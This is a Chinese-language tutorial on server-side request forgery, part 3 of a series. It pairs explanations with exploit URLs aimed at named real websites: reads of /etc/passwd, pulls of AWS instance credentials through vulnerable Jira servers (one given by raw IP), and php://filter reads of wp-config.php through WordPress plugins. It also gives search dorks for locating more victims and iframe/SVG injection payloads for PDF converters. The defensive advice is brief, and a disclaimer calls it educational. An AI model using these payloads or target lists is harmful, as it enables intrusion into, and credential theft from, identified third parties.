SSRF-服务器端请求伪造(类型和利用方法)第3部分
字数 1052 2025-08-26 22:11:15
服务器端请求伪造(SSRF)类型与利用方法详解
1. SSRF基础概念
服务器端请求伪造(Server-Side Request Forgery, SSRF)是一种安全漏洞,攻击者能够诱使服务器向攻击者选择的内部或外部系统发起请求。
2. SSRF实例分析
2.1 基本SSRF示例
https://robert-brook.com/parliament/index.php?page=http://www.parliament.uk/business/news/2019/...
此例中,page参数获取外部资源并显示其内容,存在SSRF漏洞。
2.2 SSRF到XSS转换
https://robert-brook.com/parliament/index.php?page=http://brutelogic.com.br/poc.svg
通过加载外部SVG文件实现XSS攻击。
2.3 本地文件读取
https://robert-brook.com/parliament/index.php?page=file:///etc/passwd
利用file://协议读取服务器本地文件。
3. 特定协议利用
当尝试使用dict协议时,服务器返回错误:
警告:file_get_contents():无法找到包装器"dict" - 你是否忘记在配置PHP时启用它。
这表明服务器未启用DICT URL结构。
4. FFMPEG中的SSRF漏洞
4.1 漏洞描述
FFMPEG在处理某些输入文件时存在SSRF漏洞,可导致本地文件读取。
4.2 易受攻击站点示例
- https://www.onlinevideoconverter.com/
- https://www.files-conversion.com/
4.3 相关资源
- 演示视频: https://youtu.be/OQBZ__L23KU
- 漏洞利用代码库: https://github.com/neex/ffmpeg-avi-m3u-xbin
5. Jira中的SSRF漏洞
5.1 受影响版本
Jira版本低于7.3.5存在SSRF漏洞。
5.2 漏洞端点
https://<JIRA_BASEPATH>/plugins/servlet/oauth/users/icon-uri?consumerUri=...
5.3 搜索方法
Shodan搜索语法:
X-AUSERNAME: anonymous
X-AUSERNAME: anonymous org:"Amazon.com" -- AWS环境
X-AUSERNAME: anonymous org:"Microsoft Azure" -- Azure环境
X-AUSERNAME: anonymous org:"google" -- Google环境
5.4 易受攻击站点示例
https://jira.majesco.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://jira.intellectdesign.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://team.asg.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
...
5.5 AWS元数据泄露示例
https://jira.vectormediagroup.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/
http://52.202.112.34/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/iam/security-credentials/SystemsManagerRole
6. WordPress插件中的SSRF漏洞
6.1 JSmol2WP插件
- 受影响版本:低于1.07
- 漏洞端点:
http://localhost:8080/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=wp-config.php - 搜索语法:
inurl:wp-content/plugins/jsmol2wp - 易受攻击站点:
https://www.vivelab12.fr/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=wp-config.php http://thasso.com/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=https://google.com
6.2 Qards插件
- 漏洞端点:
http://target/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com - 搜索语法:
inurl:wp-content/plugins/qards - 易受攻击站点:
http://www.horlovia-chemicals.ch/wordpress/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com https://vfsgroup.com.au/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com
7. HTML转PDF服务中的SSRF
易受攻击的在线转换服务:
- https://pdfcrowd.com/#convert_by_input
- https://convertio.co/html-pdf/
利用payload示例:
"><iframe src="file:///etc/passwd"></iframe>
"><svg/onload=document.write(document.location)>
8. 防御建议
- 输入验证和过滤
- 限制允许的URL协议
- 实施网络层防护
- 及时更新系统和插件
- 最小化服务器网络权限
9. 免责声明
本文档中提供的所有网站示例仅用于学习和测试目的,不得用于非法活动。作者不对任何滥用行为负责。